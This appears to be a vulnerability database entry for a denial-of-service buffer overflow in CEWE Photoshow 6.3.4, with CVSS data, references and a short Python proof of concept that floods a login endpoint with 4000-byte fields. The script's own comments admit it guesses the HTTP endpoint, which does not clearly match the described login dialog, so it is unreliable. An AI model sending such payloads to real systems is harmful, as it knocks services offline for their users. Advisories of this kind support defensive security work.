CVE-2018-25294

Description

CEWE Photoshow 6.3.4 contains a buffer overflow vulnerability in the login dialog that allows attackers to crash the application by submitting oversized input. Attackers can inject 4000 bytes of data into the email address and password fields to trigger a denial of service condition.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

CEWE Photoshow 6.3.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target configuration
# Replace with the actual IP and Port of the CEWE Photoshow service
target_host = "192.168.1.100"
target_port = 8080

# Malicious payload: 4000 'A' characters to trigger the overflow
buffer = b"A" * 4000

# Constructing the HTTP request assuming a standard login form submission
# The specific endpoint might vary based on the application implementation
headers = b"POST /login HTTP/1.1\r\n"
headers += b"Host: " + target_host.encode() + b"\r\n"
headers += b"Content-Type: application/x-www-form-urlencoded\r\n"
headers += b"Connection: close\r\n"

# Body with oversized email and password fields
body = b"email=" + buffer + b"&password=" + buffer

headers += b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n"

request = headers + body

try:
    print(f"[+] Sending payload to {target_host}:{target_port}...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((target_host, target_port))
    s.send(request)
    s.close()
    print("[+] Payload sent successfully. Check if the application has crashed.")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25294
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25294
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25294/
[4] VulDB https://vuldb.com/cve/CVE-2018-25294
[5] https://cewe-photoworld.com/
[6] https://cewe-photoworld.com/creator-software/windows-download
[7] https://www.exploit-db.com/exploits/45211
[8] https://www.vulncheck.com/advisories/cewe-photoshow-buffer-overflow-denial-of-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25294", "sourceIdentifier": "[email protected]", "published": "2026-04-26T22:17:30.810", "lastModified": "2026-04-27T18:53:00.053", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CEWE Photoshow 6.3.4 contains a buffer overflow vulnerability in the login dialog that allows attackers to crash the application by submitting oversized input. Attackers can inject 4000 bytes of data into the email address and password fields to trigger a denial of service condition."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://cewe-photoworld.com/", "source": "[email protected]"}, {"url": "https://cewe-photoworld.com/creator-software/windows-download", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45211", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/cewe-photoshow-buffer-overflow-denial-of-service", "source": "[email protected]"}]}}